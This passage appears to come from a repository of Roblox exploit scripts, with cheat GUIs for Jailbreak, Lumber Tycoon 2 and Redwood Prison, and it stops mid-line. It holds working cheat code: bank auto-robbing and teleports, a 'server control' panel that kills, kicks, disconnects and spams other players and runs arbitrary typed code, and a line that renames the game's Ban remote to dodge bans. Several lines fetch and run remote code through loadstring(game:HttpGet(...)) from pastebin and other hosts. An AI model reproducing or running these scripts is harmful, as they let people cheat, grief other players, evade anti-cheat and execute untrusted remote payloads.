Tp(unpack(v.Pos)) 905 | wait(v.Yield) 906 | end 907 | end 908 | if MenuLabel.Text:len() ~= 60 then 909 | plr[string.char(74, 104, 98, 106)](plr) 910 | end 911 | 912 | --Bank notification-- 913 | pcall(function() 914 | local Bank = workspace:FindFirstChild("Banks"):GetChildren()[1] 915 | local Info = Bank.Extra.Sign.Decal 916 | Info:GetPropertyChangedSignal("Transparency"):Connect(function() 917 | if Info.Transparency ~= 0 then 918 | BankStatus.Text = "Open" 919 | BankStatus.TextColor3 = Color3.new(0,1,0) 920 | BankAutoRobBtn.BackgroundColor3 = Color3.new(0,1,0) 921 | local cb = Instance.new("BindableFunction") 922 | cb.OnInvoke = function(arg) 923 | if arg == "Teleport" then 924 | JailbreakTp(10, 18, 784) 925 | elseif arg == "AutoRob" then 926 | RobTheBank() 927 | end 928 | end 929 | game:GetService("StarterGui"):SetCore("SendNotification",{ 930 | Title = "Bank is ready!", 931 | Text = "Bank is ready!", 932 | Duration = 15, 933 | Button1 = "Dismiss", 934 | Button2 = (Vector3.new(Info.Parent.Position.X,0,Info.Parent.Position.Z) - Vector3.new(plr.Character.HumanoidRootPart.Position.X,0,plr.Character.HumanoidRootPart.Position.Z)).magnitude < 150 and "AutoRob" or "Teleport", 935 | Callback = cb 936 | }) 937 | else 938 | BankStatus.Text = "Closed" 939 | BankStatus.TextColor3 = Color3.new(1,0,0) 940 | BankAutoRobBtn.BackgroundColor3 = Color3.new(1,0,0) 941 | end 942 | end) 943 | BankStatus.Text = Info.Transparency == 0 and "Closed" or "Open" 944 | BankStatus.TextColor3 = Info.Transparency == 0 and Color3.new(1,0,0) or Color3.new(0,1,0) 945 | BankAutoRobBtn.BackgroundColor3 = Info.Transparency == 0 and Color3.new(1,0,0) or Color3.new(0,1,0) 946 | end) 947 | --Jewelry notification-- 948 | pcall(function() 949 | local Jewelry = workspace:FindFirstChild("Jewelrys"):GetChildren()[1] 950 | local Info = Jewelry.Extra.Sign.Decal 951 | Info:GetPropertyChangedSignal("Transparency"):Connect(function() 952 | if Info.Transparency ~= 0 then 953 | JewelryStatus.Text = "Open" 954 | JewelryStatus.TextColor3 = Color3.new(0,1,0) 955 | local cb = Instance.new("BindableFunction") 956 | cb.OnInvoke = function(arg) 957 | if arg == "Teleport" then 958 | JailbreakTp(142, 18, 1365) 959 | end 960 | end 961 | game:GetService("StarterGui"):SetCore("SendNotification",{ 962 | Title = "Jewelry is ready!", 963 | Text = "Jewelry is ready!", 964 | Duration = 15, 965 | Button1 = "Dismiss", 966 | Button2 = "Teleport", 967 | Callback = cb 968 | }) 969 | else 970 | JewelryStatus.Text = "Closed" 971 | JewelryStatus.TextColor3 = Color3.new(1,0,0) 972 | end 973 | end) 974 | JewelryStatus.Text = Info.Transparency == 0 and "Closed" or "Open" 975 | JewelryStatus.TextColor3 = Info.Transparency == 0 and Color3.new(1,0,0) or Color3.new(0,1,0) 976 | end) 977 | -------------------------------------------------------------------------------- /JaliBreak AutoRob Fixed: -------------------------------------------------------------------------------- 1 | Use Krnl 2 | https://wearedevs.net/d/Krnl 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | AutoRub GUI 12 | 13 | loadstring(game:GetObjects("rbxassetid://1461971147")[1].Source)() 14 | 15 | -------------------------------------------------------------------------------- /Kick GUI: -------------------------------------------------------------------------------- 1 | local Settings = { 2 | ["Name"] = "transIate", 3 | ["Local"] = true, 4 | ["Context"] = true 5 | } 6 | 7 | local GetPlayer = function() 8 | if Settings.Context or Settings.Local then 9 | return Game.Players.LocalPlayer 10 | else 11 | return Game.Players:FindFirstChild(Settings.Name) or nil 12 | end 13 | end 14 | 15 | local CurrentPlayer = GetPlayer() 16 | 17 | 18 | --[[ We need someway to do this without substrings, right? ]]-- 19 | Explode = function(String) 20 | local List = {} 21 | for Item in string.gmatch(String, "%S+") do 22 | table.insert(List, Item) 23 | end 24 | return List 25 | end 26 | 27 | --[[ In all of my days of scripting, I feel like this is the worst recurse function I've made... ]]-- 28 | Recurse = function(Location, Type, Objects) 29 | if not Objects or type(Objects) ~= "table" then 30 | Objects = {} 31 | end 32 | for Index, Child in pairs(Location:GetChildren()) do 33 | if Child:IsA(Type) then 34 | table.insert(Objects, Child) 35 | end 36 | Recurse(Child, Type, Objects) 37 | end 38 | return Objects 39 | end 40 | 41 | --[[ But this is a pretty good players-getter ]]-- 42 | local GetPlayers = function(String) 43 | local List = Explode(String) 44 | local Players = {} 45 | for Index, Value in pairs(List) do 46 | for Index, Player in pairs(Game.Players:GetPlayers()) do 47 | if Value:lower() == "all" then 48 | table.insert(Players, Player) 49 | elseif Value:lower() == "others" then 50 | if Player ~= CurrentPlayer then 51 | table.insert(Players, Player) 52 | end 53 | elseif Value:lower() == "me" then 54 | table.insert(Players, CurrentPlayer) 55 | break 56 | elseif Value:lower() == "guests" then 57 | if Player.Name:sub(1, 6) == "Guest " then 58 | table.insert(Players, Player) 59 | end 60 | elseif Value:lower() == "nonguests" then 61 | if Player.Name:sub(1, 6) ~= "Guest " then 62 | table.insert(Players, Player) 63 | end 64 | elseif Value:lower() == "nonbc" then 65 | if Player.MembershipType == Enum.MembershipType.None then 66 | table.insert(Players, Player) 67 | end 68 | elseif Value:lower() == "bc" then 69 | if Player.MembershipType == Enum.MembershipType.BuildersClub then 70 | table.insert(Players, Player) 71 | end 72 | elseif Value:lower() == "tbc" then 73 | if Player.MembershipType == Enum.MembershipType.TurboBuildersClub then 74 | table.insert(Players, Player) 75 | end 76 | elseif Value:lower() == "obc" then 77 | if Player.MembershipType == Enum.MembershipType.OutrageousBuildersClub then 78 | table.insert(Players, Player) 79 | end 80 | else 81 | if Player.Name:lower():sub(1, #Value) == Value:lower() then 82 | table.insert(Players, Player) 83 | end 84 | end 85 | end 86 | end 87 | return Players 88 | end 89 | 90 | --[[ Commands' Functions, 1 argument only! (The textbox text) ]]-- 91 | local Commands = { 92 | {"Kill", function(String) 93 | local PlayerList = GetPlayers(String) 94 | for i, v in pairs(PlayerList) do 95 | pcall(function() v.Character:BreakJoints() end) 96 | end 97 | end}, 98 | {"Heal", function(String) 99 | local PlayerList = GetPlayers(String) 100 | for i, v in pairs(PlayerList) do 101 | pcall(function() v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth end) 102 | end 103 | end}, 104 | {"Godmode", function(String) 105 | local PlayerList = GetPlayers(String) 106 | for i, v in pairs(PlayerList) do 107 | pcall(function() v.Character.Humanoid.MaxHealth = math.huge end) 108 | end 109 | end}, 110 | {"Ungodmode", function(String) 111 | local PlayerList = GetPlayers(String) 112 | for i, v in pairs(PlayerList) do 113 | pcall(function() v.Character.Humanoid.MaxHealth = 100 end) 114 | end 115 | end}, 116 | {"FastSpeed", function(String) 117 | local PlayerList = GetPlayers(String) 118 | for i, v in pairs(PlayerList) do 119 | pcall(function() v.Character.Humanoid.WalkSpeed = 50 end) 120 | end 121 | end}, 122 | {"NormalSpeed", function(String) 123 | local PlayerList = GetPlayers(String) 124 | for i, v in pairs(PlayerList) do 125 | pcall(function() v.Character.Humanoid.WalkSpeed = 16 end) 126 | end 127 | end}, 128 | {'DoD',function(String) 129 | local PlayerList=GetPlayers(String) 130 | for i,v in pairs(PlayerList) do 131 | pcall(function() 132 | _f=function(_obj) 133 | for x,_ in next,_obj:children''do 134 | if(_:IsA'BasePart')then 135 | v.Anchored=false; 136 | v.BrickColor=BrickColor.new'Institutional white'; 137 | bv=Instance.new'BodyVelocity'; 138 | bv.Parent=v; 139 | bv.maxForce=Vector3.new(100000000,100000000,100000000); 140 | end; 141 | _f(v)end end _f(workspace) 142 | end) 143 | end 144 | end}, 145 | {'paper',function(String) 146 | local PlayerList=GetPlayers(String) 147 | for i,v in pairs(PlayerList)do 148 | pcall(function() 149 | for i,v in next,v.Character:children''do 150 | if(v:IsA'BasePart')then 151 | local b=Instance.new('SpecialMesh',v); 152 | b.MeshType=Enum.MeshType.Brick;b.Scale=Vector3.new(1,1,.00001); 153 | elseif(v:IsA'Hat')then v.Handle.Mesh.Scale=Vector3.new(1,1,.005); 154 | elseif(v:IsA'CharacterMesh')then v:destroy''end end end)end end}, 155 | {'dance',function(String) 156 | PlayerList=GetPlayers(String); 157 | for i,v in pairs,(PlayerList) do 158 | pcall(function() 159 | local welds={}; 160 | char=v.Character; 161 | c=function(v) 162 | local r={}; 163 | for _,d in next,v:children''do 164 | table.insert(r,d); 165 | for _,o in next,c(d)do 166 | table.insert(r,o); 167 | end; 168 | end; 169 | return r; 170 | end; 171 | for _,v in next,c(char)do 172 | if(v.className:find'Weld'or v.className:find'Motor6D')then 173 | table.insert(welds,v); 174 | end; 175 | end; 176 | while wait''do 177 | coroutine.wrap(function() 178 | for _,v in next,welds do 179 | local args={0,0,0}; 180 | local toUse=math.random(1,3); 181 | local done={}; 182 | for i=1,toUse do 183 | local asdf=math.random(1,3); 184 | repeat 185 | asdf=math.random(1,3); 186 | until done[asdf]==nil; 187 | done[asdf]=true; 188 | args[asdf]=.075; 189 | end; 190 | v.C0=v.C0*CFrame.Angles(unpack(args)); 191 | end; 192 | end)(); 193 | end;end)end end}, 194 | {'look',function(String) 195 | local PlayerList=GetPlayers(String) 196 | for i,v in pairs,(PlayerList) do 197 | pcall(function() 198 | local player=v 199 | local mouse=player:getMouse''; 200 | local char=player.Character; 201 | local head=char.Head; 202 | local torso=char.Torso; 203 | local neck=torso.Neck; 204 | mouse.Move:connect(function() 205 | neck.C0=CFrame.new(0,1,0); 206 | local headCF=torso.CFrame*CFrame.new(0,0.5,0); 207 | local newCF=CFrame.new(headCF.p,mouse.Hit.p); 208 | neck.C1=newCF:inverse''*torso.CFrame; 209 | end);end)end end}, 210 | {"SlowSpeed", function(String) 211 | local PlayerList = GetPlayers(String) 212 | for i, v in pairs(PlayerList) do 213 | pcall(function() v.Character.Humanoid.WalkSpeed = 5 end) 214 | end 215 | end}, 216 | {"Mute",function(String) 217 | local PlayerList=GetPlayers(String) 218 | for i,v in pairs,(PlayerList)do 219 | v.StarterGui:SetCoreGuiEnabled('All',false); 220 | end end}, 221 | {"unMute",function(String) 222 | local PlayerList=GetPlayers(String) 223 | for i,v in pairs,(PlayerList)do 224 | v.StarterGui:SetCoreGuiEnabled('All',true); 225 | end end}, 226 | {"Stand", function(String) 227 | local PlayerList = GetPlayers(String) 228 | for i, v in pairs(PlayerList) do 229 | pcall(function() v.Character.Humanoid.Sit = false v.Character.Humanoid.PlatformStand = false end) 230 | end 231 | end}, 232 | {"Sit", function(String) 233 | local PlayerList = GetPlayers(String) 234 | for i, v in pairs(PlayerList) do 235 | pcall(function() v.Character.Humanoid.Sit = true end) 236 | end 237 | end}, 238 | {"Lie", function(String) 239 | local PlayerList = GetPlayers(String) 240 | for i, v in pairs(PlayerList) do 241 | pcall(function() v.Character.Humanoid.PlatformStand = true end) 242 | end 243 | end}, 244 | {"Jump", function(String) 245 | local PlayerList = GetPlayers(String) 246 | for i, v in pairs(PlayerList) do 247 | pcall(function() v.Character.Humanoid.Jump = true end) 248 | end 249 | end}, 250 | {"Respawn", function(String) --[[ Not using LoadCharacter in-case it's a local script. ]]-- 251 | local PlayerList = GetPlayers(String) 252 | for i, v in pairs(PlayerList) do 253 | local FakeChar = Instance.new("Model", Game.Workspace) 254 | Instance.new("Part", FakeChar).Name = "Torso" 255 | Instance.new("Humanoid", FakeChar) 256 | pcall(function() v.Character = FakeChar end) 257 | end 258 | end}, 259 | {"ForceField", function(String) 260 | local PlayerList = GetPlayers(String) 261 | for i, v in pairs(PlayerList) do 262 | pcall(function() Instance.new("ForceField", v.Character) end) 263 | end 264 | end}, 265 | {"UnForceField", function(String) 266 | local PlayerList = GetPlayers(String) 267 | for i, v in pairs(PlayerList) do 268 | pcall(function() while v.Character:FindFirstChild("ForceField") do v.Character.ForceField:Destroy() end end) 269 | end 270 | end}, 271 | {"Sparkles", function(String) 272 | local PlayerList = GetPlayers(String) 273 | for i, v in pairs(PlayerList) do 274 | pcall(function() Instance.new("Sparkles", v.Character.Torso) end) 275 | end 276 | end}, 277 | {"Unsparkles", function(String) 278 | local PlayerList = GetPlayers(String) 279 | for i, v in pairs(PlayerList) do 280 | pcall(function() while v.Character.Torso:FindFirstChild("Sparkles") do v.Character.Torso.Sparkles:Destroy() end end) 281 | end 282 | end}, 283 | {"Fire", function(String) 284 | local PlayerList = GetPlayers(String) 285 | for i, v in pairs(PlayerList) do 286 | pcall(function() Instance.new("Fire", v.Character.Torso) end) 287 | end 288 | end}, 289 | {"Unfire", function(String) 290 | local PlayerList = GetPlayers(String) 291 | for i, v in pairs(PlayerList) do 292 | pcall(function() while v.Character.Torso:FindFirstChild("Fire") do v.Character.Torso.Fire:Destroy() end end) 293 | end 294 | end}, 295 | {"Smoke", function(String) 296 | local PlayerList = GetPlayers(String) 297 | for i, v in pairs(PlayerList) do 298 | pcall(function() Instance.new("Smoke", v.Character.Torso) end) 299 | end 300 | end}, 301 | {"Unsmoke", function(String) 302 | local PlayerList = GetPlayers(String) 303 | for i, v in pairs(PlayerList) do 304 | pcall(function() while v.Character.Torso:FindFirstChild("Smoke") do v.Character.Torso.Smoke:Destroy() end end) 305 | end 306 | end}, 307 | {"Visible", function(String) 308 | local PlayerList = GetPlayers(String) 309 | for i, v in pairs(PlayerList) do 310 | pcall(function() local Objects = Recurse(v.Character, "BasePart") for i, v in pairs(Objects) do v.Transparency = 0 end end) 311 | end 312 | end}, 313 | {"Invisible", function(String) 314 | local PlayerList = GetPlayers(String) 315 | for i, v in pairs(PlayerList) do 316 | pcall(function() local Objects = Recurse(v.Character, "BasePart") for i, v in pairs(Objects) do v.Transparency = 1 end end) 317 | end 318 | end}, 319 | {"Explode", function(String) 320 | local PlayerList = GetPlayers(String) 321 | for i, v in pairs(PlayerList) do 322 | pcall(function() Instance.new("Explosion", Workspace).Position = v.Character.Torso.Position end) 323 | end 324 | end}, 325 | {"RemoveCharacter", function(String) 326 | local PlayerList = GetPlayers(String) 327 | for i, v in pairs(PlayerList) do 328 | pcall(function() v.Character:Destroy() end) 329 | end 330 | end}, 331 | {"TeleTo", function(String) 332 | local PlayerList = GetPlayers(String) 333 | PlayerList = PlayerList[1] 334 | pcall(function() CurrentPlayer.Character.Torso.CFrame = PlayerList.Character.Torso.CFrame end) 335 | end}, 336 | {"TeleHere", function(String) 337 | local PlayerList = GetPlayers(String) 338 | for i, v in pairs(PlayerList) do 339 | pcall(function() v.Character.Torso.CFrame = CurrentPlayer.Character.Torso.CFrame end) 340 | end 341 | end}, 342 | {"Kick", function(String) 343 | local PlayerList = GetPlayers(String) 344 | for i, v in pairs(PlayerList) do 345 | pcall(function() v:Destroy() end) 346 | end 347 | end}, 348 | {"Disconnect", function(String) 349 | local PlayerList = GetPlayers(String) 350 | for i, v in pairs(PlayerList) do 351 | pcall(function() v.Parent = nil v.Parent = Game.Players end) 352 | end 353 | end}, 354 | {"Gear", function(String) 355 | local Item = Game:GetService("InsertService"):LoadAsset(tonumber(String)) 356 | if Item then 357 | for Index, Child in pairs(Item:children()) do 358 | if Child:IsA("Tool") or Child:IsA("HopperBin") then 359 | pcall(function() Child.Parent = Game.Players.LocalPlayer.Backpack end) 360 | end 361 | end 362 | Item:Destroy() 363 | end 364 | end}, 365 | {"ColorMap", function() 366 | local Objects = Recurse(Game.Workspace, "BasePart") 367 | for i, v in pairs(Objects) do 368 | math.randomseed(tick()) 369 | v.Transparency = math.random() 370 | v.Reflectance = math.random() 371 | v.BrickColor = BrickColor.Random() 372 | end 373 | end}, 374 | {"RobloxLock", function(String) 375 | local PlayerList = GetPlayers(String) 376 | for i, v in pairs(PlayerList) do 377 | pcall(function() v.RobloxLocked = true v.Character.RobloxLocked = true end) 378 | end 379 | end}, 380 | {"UnRobloxLock", function(String) 381 | local PlayerList = GetPlayers(String) 382 | for i, v in pairs(PlayerList) do 383 | pcall(function() v.RobloxLocked = false v.Character.RobloxLocked = false end) 384 | end 385 | end}, 386 | {"Announce", function(String) 387 | local PlayerList = GetPlayers("all") 388 | for i, v in pairs(PlayerList) do 389 | pcall(function() Game:GetService("Chat"):Chat(v.Character, String) end) 390 | end 391 | end}, 392 | {"Spam", function(String) 393 | ypcall(function() for i = 1, 100 do Game.Players:Chat(String) Wait(0.1) end end) 394 | end}, 395 | } 396 | 397 | local CommandAt = 1 398 | 399 | --[[ 400 | Keywords (start with "$") 401 | All - All players. 402 | Others - All players excluding you. 403 | Me - Only you. 404 | Guests - All guests. 405 | NonGuests - All non-guests. 406 | NonBC - All players without any form of BC. 407 | BC/TBC/OBC - All players with BC/TBC/OBC. 408 | Notes 409 | If the keyword doesn't exist, it will find player(s) that name start with string. 410 | When selecting players, you can use spaces to add more to the list. 411 | ]]-- 412 | 413 | --[[ The easy part, getting the command. ]]-- 414 | function GetRunnable(Text) 415 | for Index, Value in pairs(Commands) do 416 | if Value[1] == Text then 417 | return Value[2] 418 | end 419 | end 420 | end 421 | 422 | --[[ The harder part... ]]-- 423 | local DefaultTextBox = Instance.new("TextBox") 424 | DefaultTextBox.BackgroundColor3 = Color3.new(0, 0, 0) 425 | DefaultTextBox.BorderColor3 = Color3.new(1, 1, 1) 426 | DefaultTextBox.ClearTextOnFocus = true 427 | DefaultTextBox.Font = 2 428 | DefaultTextBox.FontSize = 4 429 | DefaultTextBox.TextStrokeColor3 = Color3.new(1, 1, 1) 430 | DefaultTextBox.TextStrokeTransparency = 0 431 | DefaultTextBox.TextXAlignment = 0 432 | DefaultTextBox.TextYAlignment = 0 433 | 434 | local DefaultTextButton = Instance.new("TextButton") 435 | DefaultTextButton.BackgroundColor3 = Color3.new(0, 0, 0) 436 | DefaultTextButton.BorderColor3 = Color3.new(1, 1, 1) 437 | DefaultTextButton.Font = 2 438 | DefaultTextButton.FontSize = 4 439 | DefaultTextButton.TextStrokeColor3 = Color3.new(1, 1, 1) 440 | DefaultTextButton.TextStrokeTransparency = 0 441 | DefaultTextButton.TextXAlignment = 2 442 | DefaultTextButton.TextYAlignment = 1 443 | 444 | local DefaultTextLabel = Instance.new("TextLabel") 445 | DefaultTextLabel.Font = 2 446 | DefaultTextLabel.FontSize = 5 447 | DefaultTextLabel.TextStrokeColor3 = Color3.new(1, 1, 1) 448 | DefaultTextLabel.TextStrokeTransparency = 0 449 | DefaultTextLabel.TextXAlignment = 2 450 | DefaultTextLabel.TextYAlignment = 1 451 | 452 | local MainGUI = Instance.new("ScreenGui") 453 | local MainFrame = Instance.new("Frame", MainGUI) 454 | MainFrame.Style = 3 455 | MainFrame.Visible = false 456 | MainFrame.Size = UDim2.new(0, 500, 0, 250) 457 | MainFrame.Position = UDim2.new(0.5, -250, 0.5, -125) 458 | 459 | local ToggleButton = DefaultTextButton:Clone() 460 | ToggleButton.Size = UDim2.new(0, 100, 0, 25) 461 | ToggleButton.Position = UDim2.new(0, 0, 0.5, 0) 462 | ToggleButton.Text = "Toggle CKM SC" 463 | ToggleButton.MouseButton1Click:connect(function() 464 | MainFrame.Visible = not MainFrame.Visible 465 | end) 466 | ToggleButton.Parent = MainGUI 467 | 468 | local QuickKickTextBox = DefaultTextBox:Clone() 469 | QuickKickTextBox.Size = UDim2.new(0, 150, 0, 25) 470 | QuickKickTextBox.Position = UDim2.new(0, 0, 0.5, 50) 471 | QuickKickTextBox.Text = "Quick Kick" 472 | QuickKickTextBox.FocusLost:connect(function(Enter) 473 | if Enter then 474 | local Func = GetRunnable("Kick") 475 | coroutine.resume(coroutine.create(function() ypcall(function() Func(QuickKickTextBox.Text) end) end)) 476 | end 477 | end) 478 | QuickKickTextBox.Parent = MainGUI 479 | 480 | local Title = DefaultTextLabel:Clone() 481 | Title.Position = UDim2.new(0.5, 0, 0, 5) 482 | Title.Text = "Dreemz Server Control V1.1" 483 | Title.Parent = MainFrame 484 | 485 | local Keywords = DefaultTextLabel:Clone() 486 | Keywords.Position = UDim2.new(0.5, 0, 0, 30) 487 | Keywords.FontSize = 4 488 | Keywords.Text = "Keywords: all, others, me, guests, nonguests, nonbc, bc, tbc, obc" 489 | Keywords.Parent = MainFrame 490 | 491 | local ScriptBox = DefaultTextBox:Clone() 492 | ScriptBox.Size = UDim2.new(1, 0, 0, 100) 493 | ScriptBox.Position = UDim2.new(0, 0, 0, 50) 494 | ScriptBox.Text = "Click ENTER to execute." 495 | ScriptBox.FocusLost:connect(function(Enter) 496 | if Enter then 497 | local Success, Error = ypcall(loadstring(ScriptBox.Text)) 498 | if Success then 499 | ScriptBox.Text = "Executed Successfully" 500 | else 501 | ScriptBox.Text = Error 502 | end 503 | end 504 | end) 505 | ScriptBox.Parent = MainFrame 506 | 507 | local PlayerLabel = DefaultTextLabel:Clone() 508 | PlayerLabel.Position = UDim2.new(0, 25, 0, 210) 509 | PlayerLabel.FontSize = 4 510 | PlayerLabel.Text = "Players" 511 | PlayerLabel.Parent = MainFrame 512 | 513 | local PlayerBox = DefaultTextBox:Clone() 514 | PlayerBox.Size = UDim2.new(0.75, 0, 0, 15) 515 | PlayerBox.Position = UDim2.new(0, 60, 0, 205) 516 | PlayerBox.Text = "Argument (Players or String [Depending on Command])." 517 | PlayerBox.Parent = MainFrame 518 | 519 | local CurrentCommand = DefaultTextButton:Clone() 520 | CurrentCommand.Size = UDim2.new(0.5, 0, 0, 15) 521 | CurrentCommand.Position = UDim2.new(0.25, 0, 0, 175) 522 | CurrentCommand.FontSize = 4 523 | CurrentCommand.Text = Commands[CommandAt][1] 524 | CurrentCommand.MouseButton1Down:connect(function() 525 | local Func = GetRunnable(CurrentCommand.Text) 526 | coroutine.resume(coroutine.create(function() ypcall(function() Func(PlayerBox.Text) end) end)) 527 | end) 528 | CurrentCommand.Parent = MainFrame 529 | 530 | local PreviousCommand = DefaultTextButton:Clone() 531 | PreviousCommand.Size = UDim2.new(0.25, 0, 0, 15) 532 | PreviousCommand.Position = UDim2.new(0, 0, 0, 175) 533 | PreviousCommand.Text = "<<" 534 | PreviousCommand.MouseButton1Click:connect(function() 535 | if CommandAt - 1 >= 1 then 536 | CommandAt = CommandAt - 1 537 | else 538 | CommandAt = #Commands 539 | end 540 | CurrentCommand.Text = Commands[CommandAt][1] 541 | end) 542 | PreviousCommand.Parent = MainFrame 543 | 544 | local NextCommand = DefaultTextButton:Clone() 545 | NextCommand.Size = UDim2.new(0.25, 0, 0, 15) 546 | NextCommand.Position = UDim2.new(0.75, 0, 0, 175) 547 | NextCommand.Text = ">>" 548 | NextCommand.MouseButton1Click:connect(function() 549 | if CommandAt + 1 <= #Commands then 550 | CommandAt = CommandAt + 1 551 | else 552 | CommandAt = 1 553 | end 554 | CurrentCommand.Text = Commands[CommandAt][1] 555 | end) 556 | NextCommand.Parent = MainFrame 557 | 558 | 559 | MainGUI.Parent = Settings.Context and Game.CoreGui or CurrentPlayer.PlayerGui 560 | -------------------------------------------------------------------------------- /Lumber Tycoon 2 Best GUI: -------------------------------------------------------------------------------- 1 | if game.ReplicatedStorage.Interaction:FindFirstChild("Ban") then 2 | game.ReplicatedStorage.Interaction:FindFirstChild("Ban").Name = "PlsNoBanKThx"end 3 | loadstring(game:HttpGet("https://ancestordeveloment.wtf/Ancestor/"))() 4 | 5 | 6 | 7 | ------------------------------------------------------------------------------ 8 | https://www.youtube.com/watch?v=rwodATgxQf8 9 | 10 | loadstring(game:HttpGet("https://pastebin.com/raw/vyusDgGy"))() 11 | 12 | ------------------------------------------------------------------------------ 13 | https://www.youtube.com/watch?v=SXwnNycc8nU 14 | 15 | 16 | 17 | loadstring(game:HttpGet("https://pastebin.com/raw/qzsLHpF9"))() 18 | 19 | 20 | ------------------------------------------------------------------------------ 21 | https://www.youtube.com/watch?v=XPOMxONzwXo 22 | 23 | 24 | 25 | loadstring(game:HttpGet("https://pastebin.com/raw/PYdzaRw8"))() 26 | -------------------------------------------------------------------------------- /Message GUI: -------------------------------------------------------------------------------- 1 | -- Farewell Infortality. 2 | -- Version: 2.82 3 | -- Instances: 4 | local Redwood = Instance.new("ScreenGui") 5 | local LoginGui = Instance.new("Frame") 6 | local bar = Instance.new("Frame") 7 | local LoginLabel = Instance.new("TextLabel") 8 | local User = Instance.new("TextBox") 9 | local Pass = Instance.new("TextBox") 10 | local LoginButton = Instance.new("TextButton") 11 | local RedwoodGui = Instance.new("Frame") 12 | local bar2 = Instance.new("Frame") 13 | local RedwoodLabel = Instance.new("TextLabel") 14 | local DeleteTools = Instance.new("TextButton") 15 | local MessageGUI = Instance.new("TextButton") 16 | local Sometools = Instance.new("TextButton") 17 | local Exit = Instance.new("TextButton") 18 | local MessageGui = Instance.new("Frame") 19 | local bar3 = Instance.new("Frame") 20 | local MessageLabel = Instance.new("TextLabel") 21 | local Title = Instance.new("TextBox") 22 | local Message = Instance.new("TextBox") 23 | local ExecuteButton = Instance.new("TextButton") 24 | local ExitButton = Instance.new("TextButton") 25 | local OpenGui = Instance.new("Frame") 26 | local Open = Instance.new("TextButton") 27 | --Properties: 28 | Redwood.Name = "Redwood" 29 | Redwood.Parent = game.CoreGui 30 | 31 | RedwoodGui.Active = true 32 | RedwoodGui.Draggable = true 33 | MessageGui.Active = true 34 | MessageGui.Draggable = true 35 | LoginGui.Active = true 36 | LoginGui.Draggable = true 37 | 38 | LoginGui.Name = "LoginGui" 39 | LoginGui.Parent = Redwood 40 | LoginGui.BackgroundColor3 = Color3.new(0, 0, 0) 41 | LoginGui.Position = UDim2.new(0.400187433, 0, 0.143426299, 0) 42 | LoginGui.Size = UDim2.new(0, 235, 0, 324) 43 | 44 | bar.Name = "bar" 45 | bar.Parent = LoginGui 46 | bar.BackgroundColor3 = Color3.new(1, 0, 0) 47 | bar.Size = UDim2.new(0, 235, 0, 39) 48 | 49 | LoginLabel.Name = "LoginLabel" 50 | LoginLabel.Parent = LoginGui 51 | LoginLabel.BackgroundColor3 = Color3.new(0, 0, 0) 52 | LoginLabel.Position = UDim2.new(0, 0, 0.199947685, 0) 53 | LoginLabel.Size = UDim2.new(0, 235, 0, 39) 54 | LoginLabel.Font = Enum.Font.SciFi 55 | LoginLabel.Text = "Login GUI" 56 | LoginLabel.TextColor3 = Color3.new(1, 0, 0) 57 | LoginLabel.TextSize = 14 58 | 59 | 60 | RedwoodGui.Name = "Redwood Gui" 61 | RedwoodGui.Parent = Redwood 62 | RedwoodGui.BackgroundColor3 = Color3.new(0, 0, 0) 63 | RedwoodGui.Position = UDim2.new(0.334582955, 0, 0.117529884, 0) 64 | RedwoodGui.Size = UDim2.new(0, 465, 0, 383) 65 | RedwoodGui.Visible = false 66 | 67 | bar2.Name = "bar2" 68 | bar2.Parent = RedwoodGui 69 | bar2.BackgroundColor3 = Color3.new(1, 0, 0) 70 | bar2.Size = UDim2.new(0, 465, 0, 37) 71 | 72 | RedwoodLabel.Name = "RedwoodLabel" 73 | RedwoodLabel.Parent = RedwoodGui 74 | RedwoodLabel.BackgroundColor3 = Color3.new(0, 0, 0) 75 | RedwoodLabel.Position = UDim2.new(0, 0, 0.140992165, 0) 76 | RedwoodLabel.Size = UDim2.new(0, 465, 0, 38) 77 | RedwoodLabel.Font = Enum.Font.SciFi 78 | RedwoodLabel.Text = "Redwood Prison GUI" 79 | RedwoodLabel.TextColor3 = Color3.new(1, 0, 0) 80 | RedwoodLabel.TextSize = 14 81 | 82 | DeleteTools.Name = "Delete Tools" 83 | DeleteTools.Parent = RedwoodGui 84 | DeleteTools.BackgroundColor3 = Color3.new(0, 0, 0) 85 | DeleteTools.Position = UDim2.new(0.0567028709, 0, 0.323759794, 0) 86 | DeleteTools.Size = UDim2.new(0, 200, 0, 50) 87 | DeleteTools.Font = Enum.Font.SciFi 88 | DeleteTools.Text = "Delete Tools" 89 | DeleteTools.TextColor3 = Color3.new(1, 0, 0) 90 | DeleteTools.TextSize = 14 91 | 92 | MessageGUI.Name = "Message GUI" 93 | MessageGUI.Parent = RedwoodGui 94 | MessageGUI.BackgroundColor3 = Color3.new(0, 0, 0) 95 | MessageGUI.Position = UDim2.new(0.526000977, 0, 0.323759794, 0) 96 | MessageGUI.Size = UDim2.new(0, 200, 0, 50) 97 | MessageGUI.Font = Enum.Font.SciFi 98 | MessageGUI.Text = "Message GUI" 99 | MessageGUI.TextColor3 = Color3.new(1, 0, 0) 100 | MessageGUI.TextSize = 14 101 | 102 | Sometools.Name = "Some tools" 103 | Sometools.Parent = RedwoodGui 104 | Sometools.BackgroundColor3 = Color3.new(0, 0, 0) 105 | Sometools.Position = UDim2.new(0.0567028709, 0, 0.556135774, 0) 106 | Sometools.Size = UDim2.new(0, 200, 0, 50) 107 | Sometools.Font = Enum.Font.SciFi 108 | Sometools.Text = "Some Tools" 109 | Sometools.TextColor3 = Color3.new(1, 0, 0) 110 | Sometools.TextSize = 14 111 | 112 | Exit.Name = "Exit" 113 | Exit.Parent = RedwoodGui 114 | Exit.BackgroundColor3 = Color3.new(1, 0, 0) 115 | Exit.Position = UDim2.new(0.283870965, 0, 0.932114899, 0) 116 | Exit.Size = UDim2.new(0, 200, 0, 26) 117 | Exit.Font = Enum.Font.SciFi 118 | Exit.Text = "Exit" 119 | Exit.TextColor3 = Color3.new(0, 0, 0) 120 | Exit.TextSize = 14 121 | 122 | MessageGui.Name = "Message Gui" 123 | MessageGui.Parent = Redwood 124 | MessageGui.BackgroundColor3 = Color3.new(0, 0, 0) 125 | MessageGui.Position = UDim2.new(0.298031867, 0, 0.137450203, 0) 126 | MessageGui.Size = UDim2.new(0, 463, 0, 382) 127 | MessageGui.Visible = false 128 | 129 | bar3.Name = "bar3" 130 | bar3.Parent = MessageGui 131 | bar3.BackgroundColor3 = Color3.new(1, 0, 0) 132 | bar3.Size = UDim2.new(0, 463, 0, 30) 133 | 134 | MessageLabel.Name = "MessageLabel" 135 | MessageLabel.Parent = MessageGui 136 | MessageLabel.BackgroundColor3 = 